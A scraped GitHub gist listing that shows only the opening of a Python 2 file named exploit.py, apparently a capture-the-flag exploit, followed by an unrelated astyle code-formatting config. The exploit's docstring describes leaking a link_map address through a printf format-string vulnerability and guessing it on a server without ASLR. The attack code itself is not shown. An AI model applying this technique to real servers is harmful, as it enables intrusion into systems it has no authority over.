Arne Hasselbring ahasselbring
ahasselbring
/ exploit.py
Last active
March 29, 2016 12:35
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| ''' | |
| This is not really portable. | |
| I had to guess link_map_address on the server (not really complex because of no ASLR). | |
| With ASLR (local testing) it works by leaking the address to the link_map in the initial printf vulnerability. | |
| The fact that this didn't work on the server indicates that the position of these variables on the stack dependes on the libc version. | |
| ''' | |
| local = False |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| --style=allman | |
| --indent=spaces=2 | |
| --indent-switches | |
| --indent-namespaces | |
| --min-conditional-indent=0 | |
| # --max-instatement-indent=0 too bad, this value has to be 40 at minimum | |
| --pad-oper | |
| --pad-header | |
| --unpad-paren | |
| --delete-empty-lines |